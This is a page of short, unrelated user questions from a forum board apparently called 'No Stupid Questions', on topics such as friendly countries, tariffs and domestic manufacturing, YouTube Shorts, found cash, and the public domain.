No Stupid Questions

Since we had a post about the most friendliest countries, we should look at countries that have unexpected friendly people, not the usual answers like Ireland, Scotland, Canada, Taiwan, etc. For me it’s Montenegro. Londoners are considered to be cold and rude but I find them to be very pleasant with me.

I think the egg came first because in order for the chicken to even exist and evolve to its current state, it would need to be first hatch only BY THEN it becomes the famous clucking bird we know and love.

I'll start by saying that I'd get rid of the need to shit. I'm pretty sure everyone can agree that it's unpleasant.

Not defending Dementia Donny and either way I'm not shelling out $80 for a game ever, just wondering if this is really a result of the tariffs. I understand the console price being high due to them but I don't see how it would affect the price of games that are essentially going to be 100% digital

To be clear, the current tariff execution is reckless and poorly planned. But I hear a lot of total tariff opposition from the same people who demand we continue to escalate with China over control of Taiwan, up to a potential hot war.

So what’s the plan? Western economies were brought to their knees during just a momentary interruption in shipping during the pandemic. How do you wage a war with a country that does all of your manufacturing? China could defeat most western countries without firing a single shot, just by cutting off their access to Chinese exports.

If you don’t support tariffs to bring back manufacturing jobs domestically, how do you think we could make it through a war with our manufacturing partners? I can’t reconcile the two ideas, and I don’t understand how some of y’all are.

With all the talk of tariffs, I've seen more or less this argument:

"Once the tariffs go in place, companies will start manufacturing in the USA and that's good thing."

However, when I think about being able to manufacture something like a laptop computer, or a car, these are both operations that require a lot of things:

1. the input components to build the thing
2. skilled labor that can manufacture the thing
3. supply-chains that are in place from initial build all the way to retail

The premise seems to be: "OK, tariffs go in, someone INSTANTLY sets up a company that manufactures X, then USA wins".

However, for someone to want to take the "bet" on setting up a really expensive factory, they'd have to believe that the tariff will be in place a long time, because if it is NOT... then they have made a terrible investment and the new factory will be instantly non-viable.

Am I crazy? Am I missing something? I understand that it would be great if we had domestic manufacturing but it seems like the people that are behind tariffs think you just snap your fingers and there is a factory cranking out laptops, when in my understanding this is a process that requires a huge amount of money and time.

My thinking is that the amount of people / companies in the USA that have enough capital to start up a manufacturing company like this want to make sure it's a relatively safe bet before pulling the trigger, and if past tariff behavior from Mr. Trump is any indication, we can't count on these tariffs being present for a long time.

Why are sites forcing us to deal with features we explicitly don’t want? Take YouTube Shorts for instance. I’ve made it clear I hate these things, but they keep popping up on my homepage every other week. Every time, I have to click the “Temporarily Hide” button like a damn whiner.

I can just picture the internal YouTube meetings:

Manager: “We’re not getting enough engagement on Shorts.”

Developer: “Maybe our audience doesn’t like them?”

Manager: “I’ve got an idea! Let’s force Shorts onto everyone’s homepage for a week or two each time!”

Then, later, they celebrate like they’ve invented the internet.

Is this really how it’s supposed to work? Why else are companies shoving features down our throats we clearly don’t want? Is there no better way than to just keep throwing stuff at us and hoping we’ll stick around long enough to click “Hide This Annoying Feature” again?

🤔 What’s the deal with this endless pushing of features we hate? Are they just ignoring user feedback entirely, or is there some secret strategy I’m not seeing?

I was helping my friends kids do a park clean up and one of them found a large wad of cash (less than $200). I told the one who found it that I need to check with the police before she can have it, just in case it belongs to someone in need.

But is that a thing? I didn't want to say she could keep it right away because I want to set a good example. But it isn't a ton of money so I assume the police would not be interested. So what do?

Looks like the site got hacked and wants be run malware, but I've never seen something like this before.

Recently stopped caring about removing the shells on shrimp and I just eat them with the shell on.

Why is the public domain (in terms of intellectual property) useful?

Wouldn't leasing or renting be more accurate depending on what's involved and the circumstances?
